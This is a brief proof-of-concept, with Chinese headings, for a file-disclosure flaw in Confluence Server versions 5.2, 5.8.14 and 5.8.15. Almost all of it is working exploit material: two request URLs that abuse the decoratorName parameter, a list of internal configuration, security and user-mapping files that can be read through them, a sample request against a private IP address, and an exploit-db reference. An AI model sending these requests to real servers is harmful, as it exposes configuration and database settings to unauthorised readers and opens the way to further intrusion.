影響版本:
5.2 / 5.8.14 / 5.8.15
[PoC]
http://<Confluence Server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE>
http://<Confluence Server>/admin/viewdefaultdecorator.action?decoratorName=<FILE>
This is an example of accepted <FILE> parameters
/WEB-INF/decorators.xml
/WEB-INF/glue-config.xml
/WEB-INF/server-config.wsdd
/WEB-INF/sitemesh.xml
/WEB-INF/urlrewrite.xml
/WEB-INF/web.xml
/databaseSubsystemContext.xml
/securityContext.xml
/services/statusServiceContext.xml
com/atlassian/confluence/security/SpacePermission.hbm.xml
com/atlassian/confluence/user/OSUUser.hbm.xml
com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
com/atlassian/confluence/user/ConfluenceUser.hbm.xml
比如:
http://192.168.85.129:8090/spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml
參考:
https://www.exploit-db.com/exploits/39170